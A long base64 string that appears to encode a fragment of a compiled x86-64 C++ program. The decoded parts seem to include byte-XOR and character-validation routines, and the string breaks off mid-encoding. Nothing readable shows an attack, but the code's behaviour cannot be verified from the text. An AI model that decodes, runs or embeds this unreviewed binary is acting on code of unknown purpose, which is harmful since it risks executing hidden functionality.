JoIABoFwAAAOlw/v///yUqaCAAaBgAAADpYP7///8lImggAGgZAAAA6VD+////JRpoIABoGgAAAOlA/v///yUSaCAAaBsAAADpMP7///8lCmggAGgcAAAA6SD+////JQJoIABoHQAAAOkQ/v///yX6ZyAAaB4AAADpAP7///8l8mcgAGgfAAAA6fD9////JepnIABoIAAAAOng/f///yXiZyAAaCEAAADp0P3///8l2mcgAGgiAAAA6cD9////JdJnIABoIwAAAOmw/f///yXKZyAAaCQAAADpoP3///8lwmcgAGglAAAA6ZD9////JbpnIABoJgAAAOmA/f///yWyZyAAaCcAAADpcP3///8lqmcgAGgoAAAA6WD9////JaJnIABoKQAAAOlQ/f///yWaZyAAaCoAAADpQP3///8lkmcgAGgrAAAA6TD9////JYpnIABoLAAAAOkg/f///yWCZyAAaC0AAADpEP3///8lemcgAGguAAAA6QD9////JXJnIABoLwAAAOnw/P///yVqZyAAaDAAAADp4Pz///8lYmcgAGgxAAAA6dD8////JVpnIABoMgAAAOnA/P///yVSZyAAaDMAAADpsPz///8lSmcgAGg0AAAA6aD8////JUJnIABoNQAAAOmQ/P///yU6ZyAAaDYAAADpgPz///8lMmcgAGg3AAAA6XD8////JSpnIABoOAAAAOlg/P///yUiZyAAaDkAAADpUPz///8lGmcgAGg6AAAA6UD8////JRJnIABoOwAAAOkw/P///yUKZyAAaDwAAADpIPz///8lAmcgAGg9AAAA6RD8////JfpmIABoPgAAAOkA/P///yXyZiAAaD8AAADp8Pv///8l6mYgAGhAAAAA6eD7////JeJmIABoQQAAAOnQ+////yXaZiAAaEIAAAD
pwPv///8l0mYgAGhDAAAA6bD7////JcpmIABoRAAAAOmg+////yXCZiAAaEUAAADpkPv//zHtSYnRXkiJ4kiD5PBQVEnHwCBpQABIx8EwaUAASMfHi2NAAOhn/P//9JCQSIPsCEiLBTlkIABIhcB0Av/QSIPECMOQkJCQkJCQkJCQkJCQVUiJ5VNIg+wIgD2QZyAAAHVLuyCAYABIiwWKZyAASIHrGIBgAEjB+wNIg+sBSDnYcyRmDx9EAABIg8ABSIkFZWcgAP8UxRiAYABIiwVXZyAASDnYcuLGBUNnIAABSIPECFvJw2ZmZi4PH4QAAAAAAEiDPeBhIAAAVUiJ5XQSuAAAAABIhcB0CL8ogGAAyf/gycOQkFVIieVBVkFVQVRTSIHskAEAAEiJ+0iJtVj+//+JlVT+//++CAAAAL8QAAAA6LxGAACJwkiNhWD+//+J1kiJx+i4/P//SMdF2AAAAADrbkiLRdhIi5VY/v//SI0EAg+2AEQPtuC/MAAAAOhGSQAAQYnFvwIAAADoDUcAAEGJxkiNhWD+//9Ig8AQvsRlQABIicfoFv7//0SJ9kiJx+g7/v//RInuSInH6ED+//9EieZIicfoVfz//0iDRdgBi4VU/v//SDtF2A+XwITAdYFIidhIjZVg/v//SInWSInH6Jr9///rIonTSYnESI2FYP7//0iJx+hE/f//TIngSGPTSInH6Ib9//9IjYVg/v//SInH6Cf9//9IidhIidhIgcSQAQAAW0FcQV1BXsnDVUiJ5UFUU0iB7LABAABIib1Y/v//ibVU/v//SImVSP7//8dF5AAAAABIx0XoAAAAAOnkAAAASMdF2AAAAAC+CAAAAL8QAAAA6HVFAACJwkiNhWD+//+J1kiJx+hx+///SItF6EiDwAFIA4VY/v//D7YAD7bYSItF6EiLlVj+//9IjQQCD7YARA+24EiNhWD+//9Ig8AQvsRlQABIicfo3vz//0SJ5kiJx+jj+f//id5Iicfo2fn//0iNVdhIjYVg/v//SInWSInH6BP8//+LReRIA4VI/v//SItV2IgQg0XkAUiNhWD+//9IicfoIPz//0iDRegC6yKJ00mJxEiNhWD+//9IicfoBfz//0yJ4Ehj00iJx+hH/P//i4VU/v//SDtF6A+XwITAD4UH////SIHEsAEAAFtBXMnDVUiJ5VNIg+w4SIl9yEiLRchIicfoFUEAAEiJRdhIx0XgAAAAAMdF6AAAAADrGYtF6EiLVchImA+2BAJID77ASAFF4INF6AGDfeg7D57AhMB13EiDfdgAdQdIg33gAHVdx0XsAAAAAOtCi13si1XsidABwI0MELrJQhayicj36o0EConCwfoEicjB+B+J1inGifBrwBeJyinCidCJwUiLVchIY8OIDAKDRewBg33sOw+ewITAdbO4AAAAAOsFuAEAAABIg8Q4W8nDVUiJ5Yn4iEX8D75F/CX/AAAAycNVSInlQVRTSIHsYA0AAEiJvbjy//9IibWw8v//SIuFsPL//8YAAEiLhbjy//8PtgCEwHUKu//////pbQYAAEiNheD+//9Iicfo1v7//0iNhXD///9IicfoLff//0iNhWD///9IicfoHvf//8aFwPb//wDHRcwAAAAASI1Fj0iJx+iU+v//SI1Vj0iLjbjy//9IjUWASInOSInH6Mr4//9IjZVw////SI1FgL4AAAAASInH6KBDAADrGYnTSYnESI1FgEiJx+hP+P//TIngSGPT6w5IjUWASInH6Dv4///rHInTSYnESI1Fj0iJx+go+f//TIngSGPT6VEFAABIjUWPSInH6BH5//++CAAAAL8EAAAA6JNCAABBicRIjYVw////SInH6PD2//9IicFIjYXQ/P//RIniSInOSInH6Ej5//9IjYXQ/P//SInH6Gn6//+EwA+EqgAAAEiNhdD8//+6AgAAAL4AAAAASInH6Bj3//9IjYXQ/P//SInH6Ln2//9
IicFIidBIiY2g8v//SImFqPL//0iLhaDy//9IiUWQSIuFqPL//0iJRZhIjUWQSInH6D9FAACJRcxIjYXQ/P//ugAAAAC+AAAAAEiJx+i39v//i1XMSI2NwPb//0iNhdD8//9Iic5Iicfoy/b//0iNhdD8//9IicfonPX//+noAQAASI1Fr0iJx+gL+f//SI1Vr0iLjbjy//9IjUWgSInOSInH6EH3//9IjZVw////SI1FoL4BAAAASInH6BdCAADrGYnTSYnESI1FoEiJx+jG9v//TIngSGPT6w5IjUWgSInH6LL2///rHInTSYnESI1Fr0iJx+if9///TIngSGPT6ZsDAABIjUWvSInH6Ij3//++CAAAAL8EAAAA6ApBAABBicRIjYVw////SInH6Gf1//9IicFIjYXA+v//RIniSInOSInH6L/3//9IjYXA+v//SInH6OD4//+D8AGEwHQQu/3///9BvAAAAADpyQAAAEiNhcD6//+6AgAAAL4AAAAASInH6ID1//9IjYXA+v//SInH6CH1//9IicFIidBIiY2g8v//SImFqPL//0iLhaDy//9IiUWwSIuFqPL//0iJRbhIjUWwSInH6KdDAACJRcxIjYXA+v//ugAAAAC+AAAAAEiJx+gf9f//i1XMSI2NwPb//0iNhcD6//9Iic5IicfoM/X//0iNhcD6//9IicfoBPT//0G8AQAAAOscidNJicRIjYXA+v//SInH6Mj1//9MieBIY9PrGkiNhcD6//9IicfosfX//0WF5A+EawIAAOsXSInH6A73//+7/f///+jU9v//6VICAACBfcyBAAAAdwq7/P///+k/AgAASI2FwPb//0iNlcDy//+LTcyJzkiJx+jQ+f//SIuFuPL//w+2AIhF0UiLhbjy//9Ig8ABD7YAiEXSx0XUAAAAAOtQi03Ui0XUicAPtoQFwPL//4nCMlXRiciIlAXA8v//D7ZV0Q+2RdEPr9CJ0AHAAdCNUAoPtkXSiYWc8v//idDB+h/3vZzy//+J0IhF0YNF1AGLRczR6DtF1A+XwITAdaHGRdMAx0XYAAAAAOnSAAAAx0XcAAAAAOmzAAAAx0XgAAAAAMdF5AAAAADHRegAAAAA63eLVdiJ0AHAAdABwANF6EiYD7aEBcDy//8PvsCJx+j5+v//icOLVdyJ0AHAAdABwANF6EiYD7aEBeD+//8PvsCJx+jV+v//OcMPlMCEwHQEg0XgAYtV2InQAcAB0AHAA0XoSJgPtoQFwPL//4TAdQSDReQBg0XoAYN96AUPnsCEwA+Fev///4N94AZ1DIN95AZ0BsZF0wHrE4NF3AGDfdwJD57AhMAPhT7///+DRdgBg33YCQ+ewITAD4Uf////D7ZF04PwAYTAdAq7/v///+mYAAAASI2FYP///74gakAASInH6MHx///HRew8AAAA6yWLReyJwA+2hAXA8v//D77QSI2FYP///4nWSInH6Cfy//+DRewBi0XM0eg7RewPl8CEwHXMSI2FYP///0iJx+gV8v//SInCSIuFsPL//0iJ1kiJx+gQ9P//uwAAAADrHInTSYnESI2F0Pz//0iJx+hF8///TIngSGPT6xFIjYXQ/P//SInH6C7z///rHInTSYnESI2FYP///0iJx+i48v//TIngSGPT6xFIjYVg////SInH6KHy///rIonTSYnESI2FcP///0iJx+iL8v//TIngSGPTSInH6K30//9IjYVw////SInH6G7y//+J2EiBxGANAABbQVzJw1VIieVBVFNIgezgAAAASIm9KP///4m1JP///0iJlRj///9IjUWPSInH6DL0//9IjVWPSIuNKP///0iNRYBIic5IicfoaPL//+sfidNJicRIjUWPSInH6AXz//9MieBIY9NIicfoJ/T//0iNRY9Iicfo6/L//0iLhRj////GAABIi4UY////xkAeAEiLhRj////GQEAASIuFGP///8ZASgBIi4U
Y////xkBoAEiLhRj////HQDwAAAAASI1VgEiNRZBIidZIicfoFPH//4uVJP///0iNRZCJ1kiJx+hvIwAAiEXPSI1FkEiJx+hx8f//6xyJ00mJxEiNRZBIicfoXvH//0yJ4Ehj0+nwBAAAD7ZFz4PwAYTAdAq7AAAAAOkOBQAASI1FgLoAAAAAvkFqQABIicfomPP//0iJRdBIi0XQSI1QAUiNRYC+QWpAAEiJx+h78///SIlF2EiLRdhIjVABSI1FgL5BakAASInH6F7z//9IiUXgSItF4EiNUAFIjUWAvkFqQABIicfoQfP//0iJRehIg33Q/3UISMdF0AAAAABIg33Y/3UISMdF2AAAAABIg33g/3UISMdF4AAAAABIg33o/3UISMdF6AAAAABIg33QAHUfSIN92AB1GEiDfeAAdRFIg33oAHUKuwAAAADpOwQAAEiNhXD///9Ii1XQSI1dgEiJ0boAAAAASIneSInH6Bnv//9IjYVw////SInH6Drv//9Ii5UY////SIPCSkiJxkiJ1+g08f//SItF0EiLVdhIidFIKcFIichIjUj/SItF0EiNUAFIjYVg////SI1dgEiJ3kiJx+jB7v//SI2FYP///0iJx+ji7v//SInCSIuFGP///0iJ1kiJx+jd8P//SItF2EiLVeBIidFIKcFIichIjUj/SItF2EiNUAFIjYVQ////SI1dgEiJ3kiJx+hq7v//SI2FUP///0iJx+iL7v//SIuVGP///0iDwh5IicZIidfohfD//0iNRYBIicfome7//0iJwkiLReBIjXABSI2FQP///0iNXYBIidFIifJIid5IicfoEu7//0iNhUD///9IicfoM+7//0iLlRj///9Ig8JoSInGSInX6C3w//9IjYVA////SInH6D7u//9IjVDxSI2FMP///0iNnUD///9IidG6DwAAAEiJ3kiJx+i57f//SI2FMP///0iJx+ja7f//SIuVGP///0iDwkBIicZIidfo1O///0iNhTD///9Iicfo5e3//0iNUP1IjUWgSI2dMP///0iJ0boDAAAASIneSInH6GPt//9IjUWgSInH6Ift//9Iicfo/+7//0iLlRj///+JQjxIjUWgSInH6Gnu///rHInTSYnESI1FoEiJx+hW7v//TIngSGPT6RgBAABIjUWwSI2dMP///7kDAAAAugAAAABIid5Iicfo++z//0iNVbBIjYUw////SInWSInH6FXw///rHInTSYnESI1FsEiJx+gC7v//TIngSGPT6cQAAABIjUWwSInH6Ovt//9IjYUw////SInH6Nzs//9Ii5UY////SIPCQEiJxkiJ1+jW7v//SI1FwEiNnUD///+5DwAAALoAAAAASIneSInH6Hbs//9IjVXASI2FQP///0iJ1kiJx+jQ7///6xmJ00mJxEiNRcBIicfofe3//0yJ4Ehj0+tCSI1FwEiJx+hp7f//SI2FQP///0iJx+ha7P//SIuVGP///0iDwmhIicZIidfoVO7//0iNhTD///9IicfoNe3//+s4idNJicRIjYUw////SInH6B/t//9MieBIY9PrAInTSYnESI2FQP///0iJx+gD7f//TIngSGPT6xFIjYVA////SInH6Ozs///rHInTSYnESI2FUP///0iJx+jW7P//TIngSGPT6xFIjYVQ////SInH6L/s///rHInTSYnESI2FYP///0iJx+ip7P//TIngSGPT6xFIjYVg////SInH6JLs///rHInTSYnESI2FcP///0iJx+h87P//TIngSGPT6xFIjYVw////SInH6GXs///rDUiJx+gr7v//6Pbt//+7AQAAAOsfidNJicRIjUWASInH6D7s//9MieBIY9NIicfoYO7//0iNRYBIicfoJOz//4nYSIHE4AAAAFtBXMnDVUiJ5UFUU0iB7PAIAABIib0Y9///SIm1EPf//0iLhRj3//8PtgCEwHUKu//////pYgQAAEi
NhSD///9Iicfo3fH//0iNRbBIicfoN+r//0iLhRj3//8PtgCIRd5Ii4UY9///SIPAAQ+2AIhF38dF4AAAAADHReQAAAAA6yOLTeCLReSJwA+2hAUg////icKJyIiUBSD3//+DReABg0XkAYN95DsPlsCEwHXSx0XoAAAAAOs0i03gi0XoSAOFEPf//w+2AInCiciIlAUg9///g0XgAYtF6EgDhRD3//8PtgCEwHQRg0XoAYN96H8PlsCEwHXB6wGQx0XsAAAAAOtQi03si0XsicAPtoQFIPf//4nCMlXeiciIlAUg9///D7ZV3g+2Rd4Pr9CJ0AHAAdCNUAoPtkXfiYUM9///idDB+h/3vQz3//+J0IhF3oNF7AGLRew7ReAPksCEwHWjSI1FoItV4EiNjSD3//9Iic5IicfoRe7//0iNRc9Iicfolez//0iNVc9Ii40Y9///SI1FwEiJzkiJx+jL6v//SI1VsEiNRcC+AAAAAEiJx+ikNQAA6xmJ00mJxEiNRcBIicfoU+r//0yJ4Ehj0+sOSI1FwEiJx+g/6v//6xyJ00mJxEiNRc9IicfoLOv//0yJ4Ehj0+m8AAAASI1Fz0iJx+gV6///vhAAAAC/BAAAAOiXNAAAicNIjUWwSInH6Pjo//9IicFIjYUg/f//idpIic5Iicfocev//0iNhSD9//9IicfoMuv//4TAdFiLReABwInDSI1FoEiJx+i76P//SInBSI2FIP3//0iJ2kiJzkiJx+iT6f//SI2FIP3//0iJx+hU6v//6xyJ00mJxEiNhSD9//9IicfoDur//0yJ4Ehj0+sRSI2FIP3//0iJx+j36f//6w1IicfoLev//+j46v//SI1F3UiJx+hM6///SI1V3UiLjRj3//9IjUXQSInOSInH6ILp//9IjVWwSI1F0L4BAAAASInH6Fs0AADrGYnTSYnESI1F0EiJx+gK6f//TIngSGPT6w5IjUXQSInH6Pbo///rHInTSYnESI1F3UiJx+jj6f//TIngSGPT6fQAAABIjUXdSInH6Mzp//++Q2pAAL9ghGAA6J3o//9IjVWwSInWSInH6I7p//++XWpAAEiJx+iB6P//voAcQABIicfoFOr//74QAAAAvwQAAADoFjMAAInDSI1FsEiJx+h35///SInBSI2FIPv//4naSInOSInH6PDp//9IjYUg+///SInH6LHp//+EwHRYi0XgAcCJw0iNRaBIicfoOuf//0iJwUiNhSD7//9IidpIic5IicfoEuj//0iNhSD7//9Iicfo0+j//+scidNJicRIjYUg+///SInH6I3o//9MieBIY9PrEUiNhSD7//9Iicfoduj//+sNSInH6Kzp///od+n//7sAAAAASI1FoEiJx+jG5///6ziJ00mJxEiNRaBIicfos+f//0yJ4Ehj0+sAidNJicRIjUWwSInH6Jrn//9MieBIY9NIicfovOn//0iNRbBIicfogOf//4nYSIHE8AgAAFtBXMnDVUiJ5Yl9/Il1+IlV9IlN8ESJRexEiU3ouAEAAADJw1VIieWJffyJdfiJVfSJTfBEiUXsRIlN6ItF/IPgAYXAdSiLRfSLVfiNBAILRfyLVeyLTfCNFBExwotF6A+vRRAPr8Il/wAAAOsbi0X4D69F9ANF7ANF8ANF6ANFEAtF/CX/DwAAycNVSInliX38iXX4iVX0iU3wRIlF7ESJTei4AQAAAMnDVUiJ5Yl9/Il1+IlV9IlN8ESJRexEiU3ouAEAAADJw1VIieWJffyJdfiJVfSJTfBEiUXsRIlN6LgBAAAAycNVSInliX3siXXoxkX7AMdF/AAAAADrN4tF/EiYSMHgBIuAgGtAADtF7HUfi0X8SJhIweACSIPAAYsEhYBrQAA7Reh1BsZF+wHrDoNF/AGLRfzB6B+EwHW/D7ZF+8nDVUiJ5Yl97Il16IlV5IlN4MZF+wDHRfwAAAAA62OLRfxImEjB4ASLgIBrQAA
7Rex1S4tF/EiYSMHgAkiDwAGLBIWAa0AAO0XodTKLRfxImEgBwEiDwAGLBMWAa0AAO0XkdRqLRfxImEjB4ASLgIxrQAA7ReB1BsZF+wHrDoNF/AGLRfzB6B+EwHWTD7ZF+8nDVUiJ5Yl97Il16ItV7InQweACAdABwInCwfof933oiUX0i0X0D69F6IlF9ItN9LpnZmZmicj36sH6AonIwfgfidEpwYnIiUX0i0X0i1XsidEpwYnIiUX0g0X0AYtF9GnAQEIPAIlF+ItF9GnAQEIPAIlF/ItF+ItV/InRKcGJyIP4AX4Eg0X0AYtF9MnDVUiJ5UFUU0iD7FBIifuJdayLVaxIjUWwvl9qQABIice4AAAAAOgK5f//SI1F70iJx+je5v//SInYSI1V70iNTbBIic5IicfoGOX//+sfidNJicRIjUXvSInH6LXl//9MieBIY9NIicfo1+b//0iNRe9Iicfom+X//0iJ2EiJ2EiDxFBbQVzJw1VIieVBVFNIg+xQSIn7SIl1qEiLVahIjUWwvmJqQABIice4AAAAAOiA5P//SI1F70iJx+hU5v//SInYSI1V70iNTbBIic5IicfojuT//+sfidNJicRIjUXvSInH6Cvl//9MieBIY9NIicfoTeb//0iNRe9IicfoEeX//0iJ2EiJ2EiDxFBbQVzJw1VIieVBVFNIg+wgSIn7iXXci1XcSI1F4L5nakAASInHuAAAAADo+OP//0iNRe9IicfozOX//0iJ2EiNVe9IjU3gSInOSInH6Abk///rH4nTSYnESI1F70iJx+ij5P//TIngSGPTSInH6MXl//9IjUXvSInH6Ink//9IidhIidhIg8QgW0FcycNVSInlQVVBVFNIg+woSIn7SIl1yEiJ2EiLVchIidZIicfo1OL//0iLRchIicfoeOL//4lF3OtPSItFyEiJx+hn4v//i1XcSGPSSInBSCnRSInKSInYSInWSInH6Irj//9JicSLRdyD6AFIY9BIi0XISInWSInH6G/j//8PtgBBiAQkg23cAYN93AAPn8CEwHWm6x9BidRJicVIidhIicfo1uL//0yJ6Elj1EiJx+j45P//SInYSInYSIPEKFtBXEFdycNVSInlQVRTSIPsMEiJ+0iJdciJVcREi2XESItFyEiJx+jC4f//STnED5fAhMAPhOUAAABIjUXnSInH6Hjk//9IjVXnSI1F0L4gakAASInH6LPi///rH4nTSYnESI1F50iJx+hQ4///TIngSGPTSInH6HLk//9IjUXnSInH6Dbj//9Ii0XISInH6Frh//+LVcSJ0SnBiciJRejHRewAAAAA6xVIjUXQvmpqQABIicfolOD//4NF7AGLRew7RegPnMCEwHXeSItVyEiNRdBIidZIicfoEOL//0iJ2EiNVdBIidZIicfoTuH//+sfidNJicRIjUXQSInH6Lvh//9MieBIY9NIicfo3eP//0iNRdBIicfooeH//+sSSInYSItVyEiJ1kiJx+gN4f//SInYSInYSIPEMFtBXMnDVUiJ5VNIg+woifhIiXXQiEXcx0XsAAAAAOs+i1XsSItF0EiJ1kiJx+jB4f//D7YAOkXcD5TAhMB0G4tF7EiLVdBIg8IISInGSInX6J7h//8PtgDrIoNF7AGLXexIi0XQSInH6Ebg//9IOcMPksCEwHWpuAAAAABIg8QoW8nDVUiJ5UFVQVRTSIPsWEiJ+4l1rEiJVaCJTZxEi2WcSI1FwItVrInWSInH6M/8//9IjUWwSI1NwESJ4kiJzkiJx+gE/v//6x+J00mJxEiNRcBIicfoqOD//0yJ4Ehj00iJx+jK4v//SI1FwEiJx+iO4P//SYncSI1F10iJx+h/4v//SI1F10iJwr4gakAATInn6Lvg///rHInTSYnESI1F10iJx+hY4f//TIngSGPT6YgAAABIjUXXSInH6EHh///HRdgAAAAA6z6LVdhIjUWwSInWSInH6Jb
g//8PtgAPvsBIi1WgSInWicfolP7//4hF3w++Vd9IidiJ1kiJx+ju4f//g0XYAUSLZdhIjUWwSInH6Brf//9JOcQPksCEwHWo6zhBidRJicVIidhIicfozd///0yJ6Elj1OsAidNJicRIjUWwSInH6LTf//9MieBIY9NIicfo1uH//0iNRbBIicfomt///0iJ2EiJ2EiDxFhbQVxBXcnDVUiJ5UFXQVZBVUFUU0iB7JgAAABIifuJtXz///+JlXj///+JjXT///9MiYVo////TImNYP///4tFEIiFXP///0iNRaCLlXz///+J1kiJx+gh+v//SI1FoEiJx+hZ3v//SIP4BQ+WwITAdFJJidxIjUWySInH6A/h//9IjUWySInCviBqQABMiefoS9///+scidNJicRIjUWySInH6Ojf//9MieBIY9PpbgIAAEiNRbJIicfo0d///+l8AgAASI1FoL4AAAAASInH6Cvf//8PtgAPvsCD6DCJRbRIjUWgvgEAAABIicfoDt///w+2AA++wIPoMIlFuEiNRaC+AgAAAEiJx+jx3v//D7YAD77Ag+gwiUW8SI1FoL4DAAAASInH6NTe//8PtgAPvsCD6DCJRcBIjUWgvgQAAABIicfot97//w+2AA++wIPoMIlFxEiNRaC+BQAAAEiJx+ia3v//D7YAD77Ag+gwiUXITI1lkE2J5kG9AQAAAEiNRbNIicfoBeD//0iNRbNIicK+bGpAAEyJ9+hB3v//6xmJ00mJxkiNRbNIicfo3t7//0yJ8Ehj0+t+SI1Fs0iJx+jK3v//SY1WCEmD7QGLhXT///+D6AGJwEjB4ANIA4Vg////SInGSInX6CHd//+LhXT///+D6AGJwEjB4ANIA4Vo////TIsQi33IRItNxESLRcCLTbyLVbiLdbSLhXj///+JPCSJx0H/0olFzIC9XP///wB0U+s5QYnWSYnHTYXkdCO4AQAAAEwp6EjB4ANJjRwETDnjdA5Ig+sISInf6Czd///r7UyJ+Elj1umwAAAASI1FgItNGEiNVZCLdcxIicfoCfz//+sRSI1FgItVzInWSInH6OL3//9IidhIjVWASInWSInH6GTc///rGYnTSYnESI1FgEiJx+jR3P//TIngSGPT6w5IjUWASInH6L3c///rLUGJ1EmJxUiNRZBIjVgQSI1FkEg5w3Q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skAAAAEiJvWj///+JtWT///9Ii4Vo////ugAAAAC+fWpAAEiJx+gO2f//SIlF2EiLRdhIjVABSIuFaP///759akAASInH6O7Y//9IiUXgSIN92P90B0iDfeD/dQq7AAAAAOkiAgAASI1FsEiLVdhIi51o////SInRugAAAABIid5IicfoENX//0iLRdhIi1XgSInRSCnBSInISI1I/kiLRdhIjVACSI1FoEiLnWj///9Iid5Iicfo3dT//0iLhWj///9IicfoLtX//0iJwkiLReBIjXACSI1FkEiLnWj///9IidFIifJIid5Iicfop9T//0iNRYBIjVWgSI1NsEiJzkiJx+itIwAASI2FcP///0iNVZBIjU2gSInOSInH6JMjAABIjZVw////SI1FwEiJ1kiJx+gQ1f//SI1VgEiNRdBIidZIicfo/dT//0iNVcBIjUXQSInWSInH6EX9//+LlWT////R6g+vwolF7EiNRdBIicfoUNX//+syidNJicRIjUXQSInH6D3V//9MieBIY9PrAInTSYnESI1FwEiJx+gk1f//TIngSGPT6yBIjUXASInH6BDV//+LXexIjYVw////SInH6P7U///rNYnTSYnESI2FcP///0iJx+jo1P//TIngSGPT6wCJ00mJxEiNRYBIicfoz9T//0yJ4Ehj0+sOSI1FgEiJx+i71P//6xmJ00mJxEiNRZBIicfoqNT//0yJ4Ehj0+sOSI1FkEiJx+iU1P//6xmJ00mJxEiNRaBIicfogdT//0yJ4Ehj0+sOSI1FoEiJx+h
t1P//6x+J00mJxEiNRbBIicfoWtT//0yJ4Ehj00iJx+h81v//SI1FsEiJx+hA1P//idhIgcSQAAAAW0FcycNVSInlQVRTSIHskAAAAEiJfYhIiXWASImVeP///0iJjXD///9MiYVo////SIuFaP///7oAAAAAvkFqQABIicfoXtb//0iJRdBIi0XQSI1QAUiLhWj///++QWpAAEiJx+g+1v//SIlF2EiLRdhIjVABSIuFaP///75BakAASInH6B7W//9IiUXgSItF4EiNUAFIi4Vo////vkFqQABIicfo/tX//0iJRehIg33Q/3UISMdF0AAAAABIg33Y/3UISMdF2AAAAABIg33g/3UISMdF4AAAAABIg33o/3UISMdF6AAAAABIg33QAHUfSIN92AB1GEiDfeAAdRFIg33oAHUKuAAAAADpyQEAAEiNRZBIi1XQSIudaP///0iJ0boAAAAASIneSInH6NbR//9IjVWQSItFiEiJ1kiJx+gz1f//6x+J00mJxEiNRZBIicfo4NL//0yJ4Ehj00iJx+gC1f//SI1FkEiJx+jG0v//SItF0EiLVdhIidFIKcFIichIjUj/SItF0EiNUAFIjUWgSIudaP///0iJ3kiJx+hj0f//SI1VoEiLRYBIidZIicfowNT//+sfidNJicRIjUWgSInH6G3S//9MieBIY9NIicfoj9T//0iNRaBIicfoU9L//0iLRdhIi1XgSInRSCnBSInISI1I/0iLRdhIjVABSI1FsEiLnWj///9Iid5Iicfo8ND//0iNVbBIi4V4////SInWSInH6ErU///rH4nTSYnESI1FsEiJx+j30f//TIngSGPTSInH6BnU//9IjUWwSInH6N3R//9Ii4Vo////SInH6P7Q//9IicJIi0XgSI1wAUiNRcBIi51o////SInRSInySIneSInH6HfQ//9IjVXASIuFcP///0iJ1kiJx+jR0///6x+J00mJxEiNRcBIicfoftH//0yJ4Ehj00iJx+ig0///SI1FwEiJx+hk0f//uAEAAABIgcSQAAAAW0FcycNVSInlQVdBVkFVQVRTSIPseEiJvXj///+JtXT////pzAAAAEiNRb5IicfoJNP//0iNVb5IjUWwvmpqQABIicfoX9H//0iNRaBIi5V4////SI1NsEiJzkiJx+jiHgAASI1VoEiLhXj///9IidZIicfoH9P//+sZidNJicRIjUWgSInH6MzQ//9MieBIY9PrDkiNRaBIicfouND//+sZidNJicRIjUWwSInH6KXQ//9MieBIY9PrDkiNRbBIicfokdD//+sfidNJicRIjUW+SInH6H7R//9MieBIY9NIicfooNL//0iNRb5IicfoZNH//0iLhXj///9Iicfohc///0iD+AkPlsCEwA+FFv///0iLhXj///9IicfoZ8///0iJw0iNQwFIweADSInH6DTP//9JicRMieBIiRhMieBMjWgITYnvSI1D/0mJxusQTIn/6HDO//9Jg8cISYPuAUmD/v8PlcCEwHXl61dBiddIiYVo////TYXtdCNIjUP/TCnwSMHgA0mNXAUATDnrdA5Ig+sISInf6LvP///r7UiLhWj///9JY9eJ00mJxUyJ5+ji0P//TInoSGPTSInH6MTR//9MieBIg8AISIlFwMdFyP/////HRcwAAAAA6e0AAACLjXT///+LRcy6AAAAAPfxidCFwHUZg0XIAYtFyEiYSMHgA0gDRcBIicfo983//2bHRZAAAItVzEiLhXj///9IidZIicfonM///w+2AIhFkEiNRb9IicfoGtH//0iNVb9IjU2QSI1FgEiJzkiJx+hTz///6x+J00mJxEiNRb9Iicfo8M///0yJ4Ehj00iJx+gS0f//SI1Fv0iJx+jWz///i0XISJhI